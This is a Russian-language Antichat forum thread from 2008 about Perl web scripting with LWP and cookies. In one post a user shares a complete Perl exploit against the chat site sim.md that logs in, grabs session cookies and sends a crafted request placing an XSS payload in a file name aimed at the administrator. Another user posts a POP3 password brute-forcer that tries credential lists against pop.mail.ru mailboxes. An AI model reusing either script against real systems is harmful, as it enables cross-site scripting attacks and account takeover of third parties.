ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
30.05.2008, 13:54
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
Сообщение от slider
http://search.cpan.org/~gaas/libwww-perl-5.812/lib/HTTP/Cookies.pm
тоесть куки которые я хочу отправить с запросом должны быть записаны в файл
Код:
file => "файл с куками.txt"
?
|
|
|
30.05.2008, 15:03
|
|
Постоянный
Регистрация: 03.08.2007
Сообщений: 367
Провел на форуме:
876216
Репутация:
209
|
|
Хм...а в чем проблема просто, напрямую в файл писать? Или я чето не понял? =\
|
|
|
|
30.05.2008, 15:57
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
biophreak конешно это не проблема , содержимое файла вывести в переменную массива очень легко, просто я поинтересовался правильно ли я понял содержимое скрипта
|
|
|
|
30.05.2008, 17:01
|
|
Постоянный
Регистрация: 03.08.2007
Сообщений: 367
Провел на форуме:
876216
Репутация:
209
|
|
А сорри, не увидел, да, действительно, юзать file => "файл с куками.txt" будет имхо правильнее  |
|
|
|
31.05.2008, 09:16
|
|
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559
Репутация:
2947
|
|
Кхмм.... когда то меня мучал этот же вопрос.....
могу дать как пример.. на изучение один сплойт для чата "h t t p : / / s i m . m d"
который я писал для себя, для тренеровок ... багу уже конечно прикрыли.. но я надеюсь что реализация
всего этого ... будет кому то инересна.... хех.. а возможно для кого то станет хорошей тренировочной куклой
PHP код:
#!/usr/bin/perl
########################################
## Сoded by slider
## http://forum.antichat.ru
## _____________________
## Victim:
## http://sim.md/
########################################
use IO::Socket;
use LWP::UserAgent;
use HTTP::Cookies;
#######_АВТОРИЗАЦИЯ_#######
$a_login = 'Логин';
$a_pass = 'Пароль';
#########################
$victim = 'Администратор'; # НИК ЖЕРТВЫ
$ploent = '<BODY ONLOAD=alert("XSS")>';
#########################
$ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(POST => 'http://sim.md/login.php');
my $cookie_jar = HTTP::Cookies->new;
$ua->timeout(60);
$ua->cookie_jar($cookie_jar);
$req->content("login=$a_login&password=$a_pass&tochat=1");
$req->content_type('application/x-www-form-urlencoded');
$req->referer('http://sim.md/');
my $res = $ua->request($req);
if ($res->status_line=~'302'==1)
{print "[~] Auth: OK\n"};
$req = HTTP::Request->new(GET => 'http://sim.md/chat.php');
$req->header('Accept' => 'text/html');
$req->referer('http://sim.md/login.php');
$res = $ua->request($req);
$cook = $cookie_jar->as_string;
@res_arr = split(/\n/, $cook);
$cookies = '';
foreach (@res_arr)
{if (/^Set-Cookie3: ([^;]*);(.*)/){
$cookies = $1; chomp($cookies);}}
$a=q(POST http://sim.md/records.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://sim.md/records.php
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d7186135506dc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
Host: sim.md
Content-Length: 812
Pragma: no-cache
Cookie: );$b=qq($cookies
-----------------------------7d7186135506dc
Content-Disposition: form-data; name="action"
send
-----------------------------7d7186135506dc
Content-Disposition: form-data; name="name"
$victim
-----------------------------7d7186135506dc
Content-Disposition: form-data; name="msg"
-----------------------------7d7186135506dc
Content-Disposition: form-data; name="file"; filename="$ploent"
Content-Type: application/octet-stream
-----------------------------7d7186135506dc
Content-Disposition: form-data; name="forward"
-----------------------------7d7186135506dc--
);
$pack=$a.$b;
my $h_sock = new IO::Socket::INET (PeerAddr => "sim.md", PeerPort => '80', PeerProto => 'TCP' ) or die "[-] Exploit Failed";
print $h_sock $pack;
print "[~] Success ...\n";
|
|
|
|
31.05.2008, 10:06
|
|
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559
Репутация:
2947
|
|
Кстать присмотритесь к баге... она много где поможет вам.... 
|
|
|
|
31.05.2008, 14:47
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
Извеняйте судари, это опять я и опять с ламерским вопросом))
как организовать задержку в цикле?
в гугле везде натыкался на sleep
Код:
for ($i = 1; $i < 5; $i++)
{
print $i;
sleep 3;
}
но в этом варианте через 15 секунд сразу выводит 12345
а мне нужно что бы через каждые 3 секунды выводило переменную $i |
|
|
|
31.05.2008, 15:08
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
$| = 1;
перед циклом
Последний раз редактировалось Piflit; 01.06.2008 в 20:44..
|
|
|
|
31.05.2008, 15:22
|
|
Участник форума
Регистрация: 08.10.2007
Сообщений: 259
Провел на форуме:
500748
Репутация:
137
|
|
Piflit спасибо , всё отлично
|
|
|
|
02.06.2008, 17:59
|
|
Новичок
Регистрация: 21.02.2006
Сообщений: 18
Провел на форуме:
163552
Репутация:
1
|
|
Здравствуйте!
Заранее извиняюсь за (может быть) глупый вопрос!
Почему данный скрипт на Локлке работает а на сервере нет???
Код:
#!usr/bin/perl
use Net::POP3;
$Fpass = 'passwords.txt';
$Femails = 'emails.txt';
$finds = 0;
open($emails, $Femails);
while(<$emails>)
{
chompt;
$email = $_;
open($passwords, $Fpass);
while(<$passwords>)
{
chompt;
$pass = $_;
$pop = Net::POP3->new('pop.mail.ru');
$pop = Net::POP3->new('pop.mail.ru', Timeout => 60);
if($pop->login($email, $pass)>0)
{
print "Good PASSSSSSSSSSSSSSSSSSSSSSSSS\n".
"[>]Email:".$email."\n".
"[>]Password:".$pass."\n";
}
else
{
print "[>]BAD Password:".$pass;
}
}
$pop->quit;
Close($passwords);
}
Close($emails);
Ошибка:
Код:
Can't call method "login" on an undefined value at hello.pl line 29, <$passwords> line 1.
П.С.
Сильно не бейте я только учусь!
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
